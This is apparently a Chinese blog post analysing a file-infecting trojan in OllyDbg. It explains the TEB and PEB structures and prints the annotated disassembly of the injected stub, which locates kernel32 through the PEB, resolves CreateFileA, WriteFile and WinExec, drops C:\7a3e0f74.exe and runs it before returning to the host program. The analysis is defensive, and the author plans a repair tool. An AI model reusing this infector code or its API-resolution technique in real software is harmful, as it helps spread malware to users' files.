OD 分析全盘EXE感染型木马病毒,小红伞报 TR/Crypt.XPACK.Gen
前段时间不小心运行了一个加壳工具,结果除系统盘外几乎所有的EXE文件全被感染了……记得几年前感染过一次,也是除系统盘以外的所有EXE感染,但几年前被感染后的EXE文件只要在虚拟机里运行一次,就会恢复出非感染文件,所以那次感染之后,需用到的程序中EXE文件,先在虚拟机里运行后再复制过来覆盖就可以,实际上那次感染后的至今没修复完,因有些工具不常用了。这次感染的感觉和上次不一样,实际上找修复工具也是空谈了,经常也是杀光光,所以下定决心亲自分析下并打算写个修复工具……目标文件,本机已经被感染OD工具目录中的 loaddll_木马.exe ,其它不多说直接入正题。
在分析这个被感染的文件之前先了解和学习下如何利用 PEB 查找 kernel32 地址,学习这个还要了解下 TEB 结构。 首先,我们先来认识下什么是 PEB 和 TEB:
PEB 是 Process Environment Block 的缩写,也就是进程环境块; TEB 是 Thread Environment Block 的缩写,也就是线程环境块。我们先来看下几个结构体。
TEB结构:
//
// Thread Environment Block (TEB)
//
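/*
 * Thread Environment Block (TEB), 32-bit layout as listed in the post.
 *
 * The array lengths were lost when the page was rendered (the "[N]" parts
 * were stripped with the HTML); they are recovered here from the distance
 * between neighbouring offset comments. StaticUnicodeBuffer uses the
 * well-known 261-WCHAR length, the 2 bytes up to E0Ch being alignment
 * padding. Only the first fields -- above all ProcessEnvironmentBlock at
 * 30h, reached through FS:[30h] -- matter for the analysis below; the rest
 * is version dependent and listed for reference only.
 */
typedef struct _TEB
{
    NT_TIB Tib;                                                      /* 00h  */
    PVOID EnvironmentPointer;                                        /* 1Ch  */
    CLIENT_ID Cid;                                                   /* 20h  */
    PVOID ActiveRpcHandle;                                           /* 28h  */
    PVOID ThreadLocalStoragePointer;                                 /* 2Ch  */
    struct _PEB *ProcessEnvironmentBlock;                            /* 30h  FS:[30h] -> PEB, the infector's first step */
    ULONG LastErrorValue;                                            /* 34h  */
    ULONG CountOfOwnedCriticalSections;                              /* 38h  */
    PVOID CsrClientThread;                                           /* 3Ch  */
    struct _W32THREAD* Win32ThreadInfo;                              /* 40h  */
    ULONG User32Reserved[26];                                        /* 44h  (ACh-44h)/4 */
    ULONG UserReserved[5];                                           /* ACh  (C0h-ACh)/4 */
    PVOID WOW32Reserved;                                             /* C0h  */
    LCID CurrentLocale;                                              /* C4h  */
    ULONG FpSoftwareStatusRegister;                                  /* C8h  */
    PVOID SystemReserved1[54];                                       /* CCh  (1A4h-CCh)/4 */
    LONG ExceptionCode;                                              /* 1A4h */
    struct _ACTIVATION_CONTEXT_STACK *ActivationContextStackPointer; /* 1A8h */
    UCHAR SpareBytes1[40];                                           /* 1ACh 1D4h-1ACh */
    GDI_TEB_BATCH GdiTebBatch;                                       /* 1D4h 0x4E0 bytes */
    CLIENT_ID RealClientId;                                          /* 6B4h */
    PVOID GdiCachedProcessHandle;                                    /* 6BCh */
    ULONG GdiClientPID;                                              /* 6C0h */
    ULONG GdiClientTID;                                              /* 6C4h */
    PVOID GdiThreadLocalInfo;                                        /* 6C8h */
    ULONG Win32ClientInfo[62];                                       /* 6CCh (7C4h-6CCh)/4 */
    PVOID glDispatchTable[233];                                      /* 7C4h (B68h-7C4h)/4 */
    ULONG glReserved1[29];                                           /* B68h (BDCh-B68h)/4 */
    PVOID glReserved2;                                               /* BDCh */
    PVOID glSectionInfo;                                             /* BE0h */
    PVOID glSection;                                                 /* BE4h */
    PVOID glTable;                                                   /* BE8h */
    PVOID glCurrentRC;                                               /* BECh */
    PVOID glContext;                                                 /* BF0h */
    NTSTATUS LastStatusValue;                                        /* BF4h */
    UNICODE_STRING StaticUnicodeString;                              /* BF8h */
    WCHAR StaticUnicodeBuffer[261];                                  /* C00h MAX_PATH+1, padded to E0Ch */
    PVOID DeallocationStack;                                         /* E0Ch */
    PVOID TlsSlots[64];                                              /* E10h (F10h-E10h)/4 */
    LIST_ENTRY TlsLinks;                                             /* F10h */
    PVOID Vdm;                                                       /* F18h */
    PVOID ReservedForNtRpc;                                          /* F1Ch */
    PVOID DbgSsReserved[2];                                          /* F20h */
    ULONG HardErrorDisabled;                                         /* F28h */
    PVOID Instrumentation[14];                                       /* F2Ch (F64h-F2Ch)/4 */
    PVOID SubProcessTag;                                             /* F64h */
    PVOID EtwTraceData;                                              /* F68h */
    PVOID WinSockData;                                               /* F6Ch */
    ULONG GdiBatchCount;                                             /* F70h */
    BOOLEAN InDbgPrint;                                              /* F74h */
    BOOLEAN FreeStackOnTermination;                                  /* F75h */
    BOOLEAN HasFiberData;                                            /* F76h */
    UCHAR IdealProcessor;                                            /* F77h */
    ULONG GuaranteedStackBytes;                                      /* F78h */
    PVOID ReservedForPerf;                                           /* F7Ch */
    PVOID ReservedForOle;                                            /* F80h */
    ULONG WaitingOnLoaderLock;                                       /* F84h */
    ULONG SparePointer1;                                             /* F88h */
    ULONG SoftPatchPtr1;                                             /* F8Ch */
    ULONG SoftPatchPtr2;                                             /* F90h */
    PVOID *TlsExpansionSlots;                                        /* F94h */
    ULONG ImpersionationLocale;                                      /* F98h (sic: ImpersonationLocale in ntdll symbols) */
    ULONG IsImpersonating;                                           /* F9Ch */
    PVOID NlsCache;                                                  /* FA0h */
    PVOID pShimData;                                                 /* FA4h */
    ULONG HeapVirualAffinity;                                        /* FA8h (sic: HeapVirtualAffinity in ntdll symbols) */
    PVOID CurrentTransactionHandle;                                  /* FACh */
    PTEB_ACTIVE_FRAME ActiveFrame;                                   /* FB0h */
    PVOID FlsData;                                                   /* FB4h */
    UCHAR SafeThunkCall;                                             /* FB8h */
    UCHAR BooleanSpare;                                              /* FB9h */
} TEB, *PTEB;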
PEB结构:
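/*
 * Process Environment Block (PEB), 32-bit layout as listed in the post.
 *
 * This is an older field set (EventLogSection/EventLog/FreeList); later
 * Windows versions differ beyond the first few fields. The array lengths
 * lost in the page's rendering are recovered from the neighbouring offsets;
 * GdiHandleBuffer uses the documented 34-DWORD length because the post gives
 * no offset after it. The field the infector relies on is Ldr at 0Ch, which
 * leads to PEB_LDR_DATA and the loaded-module lists.
 */
typedef struct _PEB
{
    UCHAR InheritedAddressSpace;                       // 00h
    UCHAR ReadImageFileExecOptions;                    // 01h
    UCHAR BeingDebugged;                               // 02h
    UCHAR Spare;                                       // 03h
    PVOID Mutant;                                      // 04h
    PVOID ImageBaseAddress;                            // 08h
    PPEB_LDR_DATA Ldr;                                 // 0Ch  PEB+0Ch -> PEB_LDR_DATA (used by the infector)
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;    // 10h
    PVOID SubSystemData;                               // 14h
    PVOID ProcessHeap;                                 // 18h
    PVOID FastPebLock;                                 // 1Ch
    PPEBLOCKROUTINE FastPebLockRoutine;                // 20h
    PPEBLOCKROUTINE FastPebUnlockRoutine;              // 24h
    ULONG EnvironmentUpdateCount;                      // 28h
    PVOID* KernelCallbackTable;                        // 2Ch
    PVOID EventLogSection;                             // 30h
    PVOID EventLog;                                    // 34h
    PPEB_FREE_BLOCK FreeList;                          // 38h
    ULONG TlsExpansionCounter;                         // 3Ch
    PVOID TlsBitmap;                                   // 40h
    ULONG TlsBitmapBits[2];                            // 44h  (4Ch-44h)/4
    PVOID ReadOnlySharedMemoryBase;                    // 4Ch
    PVOID ReadOnlySharedMemoryHeap;                    // 50h
    PVOID* ReadOnlyStaticServerData;                   // 54h
    PVOID AnsiCodePageData;                            // 58h
    PVOID OemCodePageData;                             // 5Ch
    PVOID UnicodeCaseTableData;                        // 60h
    ULONG NumberOfProcessors;                          // 64h
    ULONG NtGlobalFlag;                                // 68h
    UCHAR Spare2[4];                                   // 6Ch  70h-6Ch
    LARGE_INTEGER CriticalSectionTimeout;              // 70h
    ULONG HeapSegmentReserve;                          // 78h
    ULONG HeapSegmentCommit;                           // 7Ch
    ULONG HeapDeCommitTotalFreeThreshold;              // 80h
    ULONG HeapDeCommitFreeBlockThreshold;              // 84h
    ULONG NumberOfHeaps;                               // 88h
    ULONG MaximumNumberOfHeaps;                        // 8Ch
    PVOID** ProcessHeaps;                              // 90h
    PVOID GdiSharedHandleTable;                        // 94h
    PVOID ProcessStarterHelper;                        // 98h
    PVOID GdiDCAttributeList;                          // 9Ch
    PVOID LoaderLock;                                  // A0h
    ULONG OSMajorVersion;                              // A4h
    ULONG OSMinorVersion;                              // A8h
    ULONG OSBuildNumber;                               // ACh
    ULONG OSPlatformId;                                // B0h
    ULONG ImageSubSystem;                              // B4h
    ULONG ImageSubSystemMajorVersion;                  // B8h
    ULONG ImageSubSystemMinorVersion;                  // C0h in the post; B8h+4 = BCh, so this and the next offset look shifted by 4 -- verify against ntdll symbols
    ULONG GdiHandleBuffer[34];                         // C4h in the post (C0h by the arithmetic above)
    PVOID ProcessWindowStation;                        // ??? offset not given in the post
} PEB, *PPEB;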
PEB_LDR_DATA结构:
/*
 * Loader data block reached through PEB->Ldr (PEB+0Ch).
 * Three doubly linked lists of loader entries hang off it; the infector
 * walks InInitializationOrderModuleList (+1Ch) to find kernel32.dll.
 * Total size: 0x24 bytes.
 */
typedef struct _PEB_LDR_DATA
{
    ULONG      Length;                          /* +0x00 */
    BOOLEAN    Initialized;                     /* +0x04 */
    PVOID      SsHandle;                        /* +0x08 */
    LIST_ENTRY InLoadOrderModuleList;           /* +0x0c */
    LIST_ENTRY InMemoryOrderModuleList;         /* +0x14 */
    LIST_ENTRY InInitializationOrderModuleList; /* +0x1c  list head used by the sample */
} PEB_LDR_DATA, *PPEB_LDR_DATA;                 /* +0x24 */
LIST_ENTRY结构:
/*
 * Doubly linked list link as used by the loader module lists.
 * Both pointers address the LIST_ENTRY embedded in the neighbouring node,
 * not the node itself, so a list head's Flink points at the first node's
 * link field (the sample then reads the module base at link+0x08).
 */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink, *Blink; /* forward link, backward link */
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;
根据上面的了解,获取kernel32.dll的基地址原理为:在NT内核系统中fs寄存器指向TEB结构,TEB+0x30处指向PEB结构,PEB+0x0c处指向PEB_LDR_DATA结构,PEB_LDR_DATA+0x1c处是InInitializationOrderModuleList链表头,链表中每个节点对应一个已加载模块(节点+0x08处即该模块的基址DllBase),第一个节点指向ntdll.dll,第二个就是kernel32.dll的基址了(这个顺序与Windows版本有关,并非在所有版本上都成立)。在反汇编中如下:
MOV EAX,DWORD PTR FS:[0x30] ; FS指向TEB结构体内存地址,0x30处是PEB(Process Environment Block)的结构地址
MOV EAX,DWORD PTR DS:[EAX+0xC] ; EAX==00081E90-->PEB_LDR_DATA 的基址
MOV EAX,DWORD PTR DS:[EAX+0x1C] ; EAX==00081F28 --> InInitializationOrderModuleList 的第一个节点(ntdll.dll 的加载项)
MOV EAX,DWORD PTR DS:[EAX] ; EAX==00081FD0 --> Flink地址,即第二个节点(kernel32.dll 的加载项)
MOV EAX,DWORD PTR DS:[EAX+0x8] ; 变量赋值:EAX==7C800000 --> 节点+0x08 处的 DllBase,即 kernel32.dll 的基址
知识点:以后在反汇编代码中看到类似 MOV EAX,DWORD PTR FS:[0x30] 的汇编代码,一定与 TEB 和 PEB 有关,记住后就方便分析了。
其次,我们现在来分析被感染的loaddll_木马.exe,OD载入目标文件,如图所示:
00460000 >55 PUSH EBP ; OD载入后被感染程序停留在了新增加的代码入口处
00460001 8BEC MOV EBP,ESP
00460003 81EC 84000000 SUB ESP,0x84
00460009 8365 EC 00 AND DWORD PTR SS:,0x0
0046000D 8365 B0 00 AND DWORD PTR SS:,0x0
00460011 8365 E0 00 AND DWORD PTR SS:,0x0
00460015 8365 F0 00 AND DWORD PTR SS:,0x0
00460019 8365 FC 00 AND DWORD PTR SS:,0x0
0046001D E8 00000000 CALL 00460022 ; 注意这里,如果直接F8单步木马文件就会生成并开始感染,所以F7进入。
00460022 58 POP EAX
00460023 05 90020000 ADD EAX,0x290 ; EAX=00460022 再加上0x290得到004602B2,CALL 00460022 地址尾 RETN地址
00460028 8945 E8 MOV DWORD PTR SS:,EAX ; 变量赋值:=004602B2
0046002B 64:A1 30000000MOV EAX,DWORD PTR FS: ; FS指向TEB结构体内存地址,0x30处是PEB(Process Environment Block)的结构地址
00460031 8945 D8 MOV DWORD PTR SS:,EAX ; 变量赋值:=7FFDE000
00460034 C745 C4 433A5C3>MOV DWORD PTR SS:,0x375C3A43 ; 常量赋值:=0x375C3A43 开始在地址0006FF84生成一个C盘根目录下名为7a3e0f74.exe的路径
0046003B C745 C8 6133653>MOV DWORD PTR SS:,0x30653361 ; 常量赋值:=0x30653361
00460042 C745 CC 6637342>MOV DWORD PTR SS:,0x2E343766 ; 常量赋值:=0x2E343766
00460049 C745 D0 6578650>MOV DWORD PTR SS:,0x657865 ; 常量赋值:=0x657865;="C:\7a3e0f74.exe"
00460050 8B45 D8 MOV EAX,DWORD PTR SS: ; 变量赋值:EAX==7FFDE000-->PEB结构地址
00460053 8B40 0C MOV EAX,DWORD PTR DS: ; EAX==00081E90-->PEB_LDR_DATA 的基址
00460056 8B40 1C MOV EAX,DWORD PTR DS: ; EAX==00081F28 --> InInitializationOrderModuleList 进程当前已加载模块的链表
00460059 8B00 MOV EAX,DWORD PTR DS: ; EAX==00081FD0 --> Flink地址
0046005B 8945 E4 MOV DWORD PTR SS:,EAX ; 变量赋值:=00081FD0 --> Flink地址
0046005E 8B45 E4 MOV EAX,DWORD PTR SS: ; 变量赋值:EAX==00081FD0 --> Flink地址
00460061 8B40 08 MOV EAX,DWORD PTR DS: ; 变量赋值:EAX==7C800000 --> kernel32.dll的基址
00460064 8945 F4 MOV DWORD PTR SS:,EAX ; 变量赋值:=7C800000 --> kernel32.dll的基址
00460067 8B45 E8 MOV EAX,DWORD PTR SS: ; EAX==004602B2 -->取函数尾地址
0046006A C700 83C404E9 MOV DWORD PTR DS:,0xE904C483 ; ==0xE904C483 --> 在此函数RETN地址处开始写入8字节,以便在执行完木马代码段跳转到非感染程序入口
00460070 8B45 E8 MOV EAX,DWORD PTR SS: ; EAX==004602B2 -->取函数尾地址
00460073 C740 04 B6FDFAF>MOV DWORD PTR DS:,0xFFFAFDB6 ; ==0xFFFAFDB6 --> 在此函数RETN地址+4处写入整数,目的是执行完木马代码段跳转到非感染程序入口处
0046007A 8B45 F4 MOV EAX,DWORD PTR SS: ; EAX==7C800000 --> kernel32.dll地址
0046007D 8B40 3C MOV EAX,DWORD PTR DS: ; EAX==000000F0 --> "PE"偏移量
00460080 8B4D F4 MOV ECX,DWORD PTR SS: ; kernel32.7C800000
00460083 8B55 F4 MOV EDX,DWORD PTR SS: ; kernel32.7C800000
00460086 035401 78 ADD EDX,DWORD PTR DS: ; EDX=7C80262C --> kernel32.7C80262C 输出表地址
0046008A 8955 DC MOV DWORD PTR SS:,EDX ; ntdll.KiFastSystemCallRet
0046008D 8B45 DC MOV EAX,DWORD PTR SS: ; EAX==7C80262C (kernel32.7C80262C)
00460090 8B4D F4 MOV ECX,DWORD PTR SS: ; ECX==7C800000 (kernel32.7C800000)
00460093 0348 1C ADD ECX,DWORD PTR DS: ; ECX=7C802654 (kernel32.7C802654) 输出表+0x1C 处为 AddressOfFunctions,加上基址得到函数地址表(RVA 数组),下面循环中按序号从中取函数地址
00460096 894D BC MOV DWORD PTR SS:,ECX
00460099 8B45 DC MOV EAX,DWORD PTR SS: ; kernel32.7C80262C
0046009C 8B4D F4 MOV ECX,DWORD PTR SS: ; kernel32.7C800000
0046009F 0348 20 ADD ECX,DWORD PTR DS: ; ECX=7C803538 --> 输出表+0x20 处为 AddressOfNames,加上基址得到函数名称表(RVA 数组),下面循环按 i 从中取名称逐段比较
004600A2 894D B4 MOV DWORD PTR SS:,ECX
004600A5 8B45 DC MOV EAX,DWORD PTR SS: ; kernel32.7C80262C
004600A8 8B4D F4 MOV ECX,DWORD PTR SS: ; kernel32.7C800000
004600AB 0348 24 ADD ECX,DWORD PTR DS: ; ECX=7C80441C (kernel32.7C80441C) 输出表+0x24 处为 AddressOfNameOrdinals,加上基址得到名称序号表(WORD 数组,下面用 MOVZX 按 i 取序号再查函数地址表)
004600AE 894D B8 MOV DWORD PTR SS:,ECX
004600B1 8365 8C 00 AND DWORD PTR SS:,0x0 ; =0
004600B5 EB 07 JMP SHORT 004600BE ; 004600BE
004600B7 8B45 8C MOV EAX,DWORD PTR SS: ; 循环体开始,循环取函数名称
004600BA 40 INC EAX ; 自加1
004600BB 8945 8C MOV DWORD PTR SS:,EAX
004600BE 8B45 DC MOV EAX,DWORD PTR SS: ; i=0 EAX==7C80262C (kernel32.7C80262C)
004600C1 8B4D 8C MOV ECX,DWORD PTR SS:
004600C4 3B48 18 CMP ECX,DWORD PTR DS: ; 当i=0时,ECX和输出表+0x18处的名称数量(NumberOfNames)0x3B9比较,如果ECX<0x3B9,则不跳;如果ECX>=0x3B9,则跳转(循环结束)
004600C7 0F83 61010000 JNB 0046022E ; 0046022E
004600CD 8B45 8C MOV EAX,DWORD PTR SS: ; 当i=0时,EAX==0
004600D0 8B4D B8 MOV ECX,DWORD PTR SS: ; kernel32.7C80441C
004600D3 0FB70441 MOVZX EAX,WORD PTR DS: ; 当i=0时,EAX=0
004600D7 8B4D BC MOV ECX,DWORD PTR SS: ; kernel32.7C802654
004600DA 8B55 F4 MOV EDX,DWORD PTR SS: ; kernel32.7C800000
004600DD 031481 ADD EDX,DWORD PTR DS: ; 当i=0时,EDX=7C80A6D4 (kernel32.ActivateActCtx)
004600E0 8955 88 MOV DWORD PTR SS:,EDX ; ntdll.KiFastSystemCallRet
004600E3 8B45 8C MOV EAX,DWORD PTR SS: ; 当i=0时,EAX==0
004600E6 8B4D B4 MOV ECX,DWORD PTR SS: ; kernel32.7C803538
004600E9 8B55 F4 MOV EDX,DWORD PTR SS: ; kernel32.7C800000
004600EC 031481 ADD EDX,DWORD PTR DS: ; 当i=0时,EDX=7C804B9B (kernel32.7C804B9B), ASCII "ActivateActCtx"
004600EF 8955 84 MOV DWORD PTR SS:,EDX ; ntdll.KiFastSystemCallRet
004600F2 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004600F5 8138 4765744D CMP DWORD PTR DS:,0x4D746547 ; 当i=0时,==69746341 和 0x4D746547比较 ,>0x4D746547 跳转;如果=0x4D746547,则不跳
004600FB 75 6A JNZ SHORT 00460167 ; 00460167
004600FD 8B45 84 MOV EAX,DWORD PTR SS: ; 当i=0x173时,EAX==7C806773 (kernel32.7C806773), ASCII "GetMailslotInfo"
00460100 8178 04 6F64756>CMP DWORD PTR DS:,0x6C75646F ; 当i=0x173时,==736C6961,0x736C6961>0x6C75646F时,则跳实现;=0x6C75646F时,则不跳
00460107 75 5E JNZ SHORT 00460167 ; 00460167
00460109 8B45 84 MOV EAX,DWORD PTR SS: ; 当i=0x174时经过,EAX==7C806783 (kernel32.7C806783), ASCII "GetModuleFileNameA"
0046010C 8178 08 6548616>CMP DWORD PTR DS:,0x6E614865 ; 当i=0x174时,==6C694665,6C694665<0x6E614865时,则跳实现;当i=0x176时,==6E614865=0x6E614865 则不跳
00460113 75 52 JNZ SHORT 00460167 ; 00460167
00460115 8B45 84 MOV EAX,DWORD PTR SS: ; 当i=0x176时,EAX==7C8067A9 (kernel32.7C8067A9), ASCII "GetModuleHandleA"
00460118 8178 0C 646C654>CMP DWORD PTR DS:,0x41656C64 ; 当i=0x176时,不跳
0046011F 75 46 JNZ SHORT 00460167 ; 00460167
00460121 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
00460124 8B40 10 MOV EAX,DWORD PTR DS:
00460127 25 FF000000 AND EAX,0xFF ; 当i=0x176时,EAX=0
0046012C 75 39 JNZ SHORT 00460167 ; 上面取名称第0x10字节并与0xFF相与,是检查"GetModuleHandleA"(16个字符)之后是否为字符串结尾0;当i=0x176时该字节为0,所以不跳
0046012E 837D EC 00 CMP DWORD PTR SS:,0x0 ; =00000000=0x0,则不跳;第二次大循环时当i=0x176时跳转
00460132 75 2E JNZ SHORT 00460162 ; 00460162
00460134 8B45 88 MOV EAX,DWORD PTR SS: ; kernel32.WriteFile
00460137 8945 EC MOV DWORD PTR SS:,EAX
0046013A C745 90 4B65726>MOV DWORD PTR SS:,0x6E72654B ; 从地址0006FF50开始写入Kernel32.dll名称
00460141 C745 94 656C333>MOV DWORD PTR SS:,0x32336C65
00460148 C745 98 2E646C6>MOV DWORD PTR SS:,0x6C6C642E
0046014F 8365 9C 00 AND DWORD PTR SS:,0x0
00460153 8D45 90 LEA EAX,DWORD PTR SS: ; EAX=0006FF50, (ASCII "Kernel32.dll")
00460156 50 PUSH EAX
00460157 FF55 EC CALL DWORD PTR SS: ; kernel32.GetModuleHandleA
0046015A 8945 F4 MOV DWORD PTR SS:,EAX
0046015D^ E9 18FFFFFF JMP 0046007A ; 0046007A
00460162 E9 A2000000 JMP 00460209 ; 00460209
00460167 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
0046016A 8138 43726561 CMP DWORD PTR DS:,0x61657243 ; 当i=0x173时,==4D746547,0x4D746547<0x61657243,则跳实现
00460170 75 20 JNZ SHORT 00460192 ; 00460192
00460172 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
00460175 8178 04 7465466>CMP DWORD PTR DS:,0x69466574
0046017C 75 14 JNZ SHORT 00460192 ; 00460192
0046017E 8B45 84 MOV EAX,DWORD PTR SS: ; 第二次大循环当i=0x4D时经过,EAX==7C805143 (kernel32.7C805143), ASCII "CreateFiber"
00460181 8178 08 6C65410>CMP DWORD PTR DS:,0x41656C
00460188 75 08 JNZ SHORT 00460192 ; 00460192
0046018A 8B45 88 MOV EAX,DWORD PTR SS: ; 第二次大循环当i=0x4F时经过,EAX==7C801A28 (kernel32.CreateFileA)
0046018D 8945 B0 MOV DWORD PTR SS:,EAX
00460190 EB 77 JMP SHORT 00460209 ; 00460209
00460192 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
00460195 8138 57726974 CMP DWORD PTR DS:,0x74697257 ; 当i=0时,==69746341 < 0x74697257 跳转
0046019B 75 24 JNZ SHORT 004601C1 ; 004601C1
0046019D 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601A0 8178 04 6546696>CMP DWORD PTR DS:,0x6C694665
004601A7 75 18 JNZ SHORT 004601C1 ; 004601C1
004601A9 8B45 84 MOV EAX,DWORD PTR SS: ; 第二次大循环当i=0x38F时,EAX==7C808DCB (kernel32.7C808DCB), ASCII "WriteFile"
004601AC 8B40 08 MOV EAX,DWORD PTR DS:
004601AF 25 FFFF0000 AND EAX,0xFFFF
004601B4 83F8 65 CMP EAX,0x65 ; 第二次大循环当i=0x38F时,EAX=0x65,则不跳
004601B7 75 08 JNZ SHORT 004601C1 ; 004601C1
004601B9 8B45 88 MOV EAX,DWORD PTR SS: ; kernel32.WriteFile
004601BC 8945 E0 MOV DWORD PTR SS:,EAX
004601BF EB 48 JMP SHORT 00460209 ; 00460209
004601C1 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601C4 8138 436C6F73 CMP DWORD PTR DS:,0x736F6C43 ; 当i=0时,==69746341 < 0x736F6C43 跳转
004601CA 75 20 JNZ SHORT 004601EC ; 004601EC
004601CC 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601CF 8178 04 6548616>CMP DWORD PTR DS:,0x6E614865 ; 第二次大循环时经过
004601D6 75 14 JNZ SHORT 004601EC ; 004601EC
004601D8 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601DB 8178 08 646C650>CMP DWORD PTR DS:,0x656C64
004601E2 75 08 JNZ SHORT 004601EC ; 004601EC
004601E4 8B45 88 MOV EAX,DWORD PTR SS: ; kernel32.WriteFile
004601E7 8945 F0 MOV DWORD PTR SS:,EAX
004601EA EB 1D JMP SHORT 00460209 ; 00460209
004601EC 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601EF 8138 57696E45 CMP DWORD PTR DS:,0x456E6957 ; 当i=0时,==69746341 > 0x456E6957 跳转
004601F5 75 12 JNZ SHORT 00460209 ; 00460209
004601F7 8B45 84 MOV EAX,DWORD PTR SS: ; 第二次大循环当i=0x383时,EAX==7C808CD7 (kernel32.7C808CD7), ASCII "WinExec"
004601FA 8178 04 7865630>CMP DWORD PTR DS:,0x636578 ; 第二次大循环当i=0x383时,==00636578 和比较值相等,则不跳
00460201 75 06 JNZ SHORT 00460209 ; 00460209
00460203 8B45 88 MOV EAX,DWORD PTR SS: ; kernel32.WriteFile
00460206 8945 FC MOV DWORD PTR SS:,EAX
00460209 837D EC 00 CMP DWORD PTR SS:,0x0 ; 和0相等时跳转;第二次大循环时,=7C80B731 (kernel32.GetModuleHandleA)
0046020D 74 1A JE SHORT 00460229 ; 00460229
0046020F 837D B0 00 CMP DWORD PTR SS:,0x0 ; 第二次开始循环时,=7C801A28 (kernel32.CreateFileA)
00460213 74 14 JE SHORT 00460229 ; 00460229
00460215 837D E0 00 CMP DWORD PTR SS:,0x0 ; 第二次大循环时,=7C810E17 (kernel32.WriteFile)
00460219 74 0E JE SHORT 00460229 ; 00460229
0046021B 837D F0 00 CMP DWORD PTR SS:,0x0 ; 第二次大循环时,=7C809BD7 (kernel32.CloseHandle)
0046021F 74 08 JE SHORT 00460229 ; 00460229
00460221 837D FC 00 CMP DWORD PTR SS:,0x0 ; 第二次大循环时,当i=0x38F时,=7C8623AD (kernel32.WinExec)
00460225 74 02 JE SHORT 00460229 ; 00460229
00460227 EB 05 JMP SHORT 0046022E ; 0046022E
00460229^ E9 89FEFFFF JMP 004600B7 ; 循环尾
0046022E 6A 00 PUSH 0x0 ; 第二次大循环当i=0x38F时,开始创建木马文件
00460230 68 80000000 PUSH 0x80
00460235 6A 02 PUSH 0x2
00460237 6A 00 PUSH 0x0
00460239 6A 00 PUSH 0x0
0046023B 68 000000C0 PUSH 0xC0000000
00460240 8D45 C4 LEA EAX,DWORD PTR SS: ; EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
00460243 50 PUSH EAX ; 压栈 EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
00460244 FF55 B0 CALL DWORD PTR SS: ; kernel32.CreateFileA
00460247 8945 C0 MOV DWORD PTR SS:,EAX ; EAX=00000034
0046024A 837D C0 FF CMP DWORD PTR SS:,-0x1
0046024E 74 61 JE SHORT 004602B1 ; 木马文件 7a3e0f74.exe 创建成功则不跳转
00460250 8B45 E8 MOV EAX,DWORD PTR SS: ; 创建木马文件函数尾地址EAX==004602B2 (loaddll_.004602B2)
00460253 8945 80 MOV DWORD PTR SS:,EAX
00460256 83A5 7CFFFFFF 0>AND DWORD PTR SS:,0x0
0046025D EB 0D JMP SHORT 0046026C ; 0046026C
0046025F 8B85 7CFFFFFF MOV EAX,DWORD PTR SS: ; 循环开始
00460265 40 INC EAX
00460266 8985 7CFFFFFF MOV DWORD PTR SS:,EAX
0046026C 81BD 7CFFFFFF F>CMP DWORD PTR SS:,0x1F4 ; 如果<0x1F4,则不跳转
00460276 7D 39 JGE SHORT 004602B1 ; 004602B1
00460278 8B45 80 MOV EAX,DWORD PTR SS: ; loaddll_.004602BA
0046027B 8138 4D5A9000 CMP DWORD PTR DS:,0x905A4D ; ==E904C483 和 0x905A4D 比较,这里就不多写了,只要相等时就不跳转;当i=8时,==00905A4D和比较值相等,则不跳
00460281 75 25 JNZ SHORT 004602A8 ; 004602A8
00460283 6A 00 PUSH 0x0 ; 这里开始向所创建的木马文件写入数据
00460285 8D45 F8 LEA EAX,DWORD PTR SS: ; EAX=0006FFB8
00460288 50 PUSH EAX
00460289 68 004C0100 PUSH 0x14C00
0046028E FF75 80 PUSH DWORD PTR SS: ; loaddll_.004602BA
00460291 FF75 C0 PUSH DWORD PTR SS: ; 所创建文件句柄0x34
00460294 FF55 E0 CALL DWORD PTR SS: ; kernel32.WriteFile
00460297 FF75 C0 PUSH DWORD PTR SS: ; 木马文件句柄,写入后下面一行关闭句柄
0046029A FF55 F0 CALL DWORD PTR SS: ; kernel32.CloseHandle
0046029D 6A 05 PUSH 0x5 ; 这里开始就一定要注意了,这里就是运行所创建的木马文件,当然我之后是不会执行的,因在实体机里分析
0046029F 8D45 C4 LEA EAX,DWORD PTR SS: ; EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")========>下面的代码就不执行了,不然EXE文件又要被感染了!!!!!!!!!
004602A2 50 PUSH EAX ; 压栈 EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
004602A3 FF55 FC CALL DWORD PTR SS: ; kernel32.WinExec
004602A6 EB 09 JMP SHORT 004602B1 ; 004602B1
004602A8 8B45 80 MOV EAX,DWORD PTR SS: ; loaddll_.004602BA
004602AB 40 INC EAX
004602AC 8945 80 MOV DWORD PTR SS:,EAX
004602AF^ EB AE JMP SHORT 0046025F ; 0046025F
004602B1 C9 LEAVE
004602B2 83C4 04 ADD ESP,0x4 ; 写入8字节数据,以便木马执行完成跳转到非感染程序入口
004602B5- E9 B6FDFAFF JMP 00410070 ; 00410070
004602BA 4D DEC EBP
004602BB 5A POP EDX ; ntdll.KiFastSystemCallRet
004602BC 90 NOP
004602BD 0003 ADD BYTE PTR DS:,AL
004602BF 0000 ADD BYTE PTR DS:,AL
小结:
1、上面的代码中,先找到kernel32.dll中的函数GetModuleHandleA的地址;
2、再利用 GetModuleHandleA 找到 CreateFileA 、WriteFile 、CloseHandle 和 WinExec 等函数地址。调用CreateFileA 、WriteFile 、CloseHandle 等函数在C盘根目录下生成木马文件 7a3e0f74.exe,如图所示:
最后用 WinExec 函数来运行所生成的木马文件 7a3e0f74.exe ,如图所示:
